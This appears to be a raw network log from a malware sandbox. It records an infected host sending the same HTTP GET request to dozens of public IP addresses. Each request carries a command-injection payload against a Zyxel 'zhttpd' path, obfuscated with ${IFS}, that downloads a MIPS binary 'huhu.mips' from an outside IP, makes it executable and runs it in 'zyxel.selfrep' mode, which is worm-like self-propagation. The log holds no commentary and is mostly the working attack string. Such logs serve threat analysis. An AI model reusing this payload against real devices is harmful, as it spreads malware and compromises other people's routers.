                                                        Feb 2, 2024 06:20:58.700978041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1649192.168.2.1457998219.25.26.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.701021910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1650192.168.2.144841014.106.155.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.701050043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1651192.168.2.1444264212.216.243.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.701090097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1652192.168.2.143581236.169.210.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.701144934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1653192.168.2.1447758108.0.103.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.701155901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1654192.168.2.1439138206.63.95.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.701198101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1655192.168.2.1437716187.180.9.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.701246023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1656192.168.2.145278436.246.14.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.701306105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1657192.168.2.143942286.54.177.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.701335907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1658192.168.2.1447436160.205.127.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.701392889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1659192.168.2.1455884122.125.37.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.701426983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1660192.168.2.1458580143.96.20.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.701461077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1661192.168.2.144591443.100.86.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.701488972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1662192.168.2.145431465.177.34.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.701514006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1663192.168.2.143798680.66.95.71443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.701565981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1664192.168.2.145013086.112.208.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.701601982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1665192.168.2.143491045.13.187.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.701646090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1666192.168.2.1443874172.253.163.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.701678038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1667192.168.2.1435218193.26.252.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.701726913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1668192.168.2.1434596125.45.113.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.701755047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1669192.168.2.1457124213.114.178.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.701812029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1670192.168.2.1442198164.77.166.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.701843023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1671192.168.2.145899274.239.210.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.701894045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1672192.168.2.1455506122.232.87.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.701929092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1673192.168.2.1455020147.236.44.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.701987028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1674192.168.2.144303447.7.197.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.702025890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1675192.168.2.145544658.165.160.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.702059984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1676192.168.2.1436254136.246.99.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.702101946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1677192.168.2.1454512111.226.227.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.702136040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1678192.168.2.1435924133.214.108.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.702176094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1679192.168.2.1441332145.173.81.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.702214956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1680192.168.2.1449896107.174.67.233443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.702275038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1681192.168.2.1446618192.24.239.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.702306032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1682192.168.2.1441976130.201.66.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.702341080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1683192.168.2.145361835.120.47.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.702377081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1684192.168.2.146065237.213.71.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.702405930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1685192.168.2.144090231.203.184.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.702457905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1686192.168.2.144822277.52.176.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.702502012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1687192.168.2.145544294.253.252.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.702528954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1688192.168.2.146015866.19.211.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.702570915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1689192.168.2.144206227.161.255.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.702613115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1690192.168.2.145070843.136.20.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.702656031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1691192.168.2.144245041.229.130.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.702698946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1692192.168.2.1432912105.233.216.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.702734947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1693192.168.2.1455116174.1.254.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.702776909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1694192.168.2.1435530137.180.94.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.702806950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1695192.168.2.145389053.191.184.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.702858925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1696192.168.2.144557476.230.2.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.702908039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1697192.168.2.1442426163.225.107.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.702934027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1698192.168.2.1456744173.57.50.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.702995062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1699192.168.2.143702234.39.62.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.703011036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1700192.168.2.144227857.107.43.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.703047037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1701192.168.2.143620086.151.11.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.703080893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1702192.168.2.145252854.173.233.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.703135014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1703192.168.2.144498012.172.227.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.703175068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1704192.168.2.1460306175.162.0.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.703210115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1705192.168.2.144042834.93.148.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.703246117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1706192.168.2.1436666167.59.71.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.703289986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1707192.168.2.144445871.38.33.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.703322887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1708192.168.2.1447658213.59.185.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.703355074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1709192.168.2.144426092.223.94.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.703396082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1710192.168.2.1460584129.34.231.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.703429937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1711192.168.2.1460576195.95.216.242443
                                                        TimestampBytes transferredDirectionData
